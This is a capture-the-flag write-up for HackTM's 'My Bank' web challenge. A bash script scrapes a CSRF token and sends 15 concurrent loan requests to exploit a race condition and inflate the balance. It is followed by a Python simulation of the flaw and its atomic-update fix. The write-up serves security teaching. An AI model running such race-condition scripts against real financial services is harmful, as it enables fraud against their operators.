My Bank [web]

My Bank

Who's got my money? Please abstain from brute-forcing files.


A banking website that allows loaning money.


We try a race condition:

#!/bin/bash
# $url (the loan page) and $cookie (the logged-in session cookie) are set beforehand
ua="User-Agent: Mozilla/5.0"
# Fetch the loan form once and pull out the hidden CSRF token (variable name kept from the original)
ssrf=`curl -s "$url" -H "$ua" -H "Cookie: $cookie" 2>&1 | pcregrep -o1 'name=\"csrf_token\" type=\"hidden\" value=\"(.*)\"' -`

# Fire 15 loan requests at once; the trailing & backgrounds each curl so they overlap
for i in `seq 15`; do
    curl "$url" -H "$ua" -H "Cookie: $cookie" --data "csrf_token=$ssrf&loan=100" &
done

# Give the background requests time to finish, then read back the balance
# (the balance-page URL is elided in the original; the empty '' is left as it was)
sleep 6 && echo "[*] maybe haxed?" && curl -s '' -H "$ua" -H "Cookie: $cookie" 2>&1 | pcregrep -o1 "Money: (.*) tBTC"

The trick here is to append a & after the cURL command so that the process moves to the background. This way, you can make multiple requests simultaneously, and more importantly, avoid having to write some complicated code that deals with threads.
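As an added illustration (not part of the original writeup), the server-side bug that the overlapping requests hit, simulated next to its fix: the loan handler checks eligibility and then updates the account as two separate steps, so every request that reads the account before the first write lands is approved. The Account class, the handler names and the one-loan limit are assumptions; the barrier only makes the interleaving deterministic.

```python
import threading

LOAN_LIMIT = 1      # assumed rule: at most one outstanding loan per account
LOAN_AMOUNT = 100   # the loan=100 that the writeup posts

class Account:
    def __init__(self):
        self.loans, self.balance = 0, 0
        self.lock = threading.Lock()  # stands in for the database row lock

def loan_vulnerable(acct, window):
    # TOCTOU: the check and the update are separate steps, so every request
    # that reads the account before the first write passes the check.
    if acct.loans >= LOAN_LIMIT:      # time of check
        return False
    window()                          # the gap the 15 backgrounded curls overlap in
    with acct.lock:                   # time of use: atomic, but decided too early
        acct.loans += 1
        acct.balance += LOAN_AMOUNT
    return True

def loan_safe(acct, window):
    # Fix: check and update in one critical section. In SQL: one conditional
    # UPDATE ... WHERE loans < LIMIT (then test the row count) or SELECT ... FOR UPDATE.
    with acct.lock:
        if acct.loans >= LOAN_LIMIT:
            return False
        window()
        acct.loans += 1
        acct.balance += LOAN_AMOUNT
        return True

def race(handler, n=15):
    # Fire n concurrent requests at a fresh account, like the curl loop with '&'.
    # The barrier makes the read-to-write latency deterministic: with the vulnerable
    # handler all n requests reach the window before any write; with the safe handler
    # the lock serialises them, the barrier cannot fill, and the window times out.
    acct = Account()
    barrier = threading.Barrier(n, timeout=1.0)
    def window():
        try:
            barrier.wait()
        except threading.BrokenBarrierError:
            pass
    threads = [threading.Thread(target=handler, args=(acct, window)) for _ in range(n)]
    for t in threads: t.start()
    for t in threads: t.join()
    return acct.loans, acct.balance

if __name__ == "__main__":
    print("vulnerable:", race(loan_vulnerable))  # (15, 1500): the writeup's 1,500 tBTC
    print("fixed:     ", race(loan_safe))        # (1, 100)
```

The same fix applies server-side whether the store is a lock, a conditional UPDATE or a transaction with row locking: the eligibility check and the balance change must be one atomic operation.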

This gets us to our target balance, Money: 1,500.00 tBTC, and we can buy the flag.


Well done! You have just bought a HackTM{9f19d6b8fdc9f5c6426343f5b004e6c6794d96b9be329402af463c294297550b} with 1337 tBTC.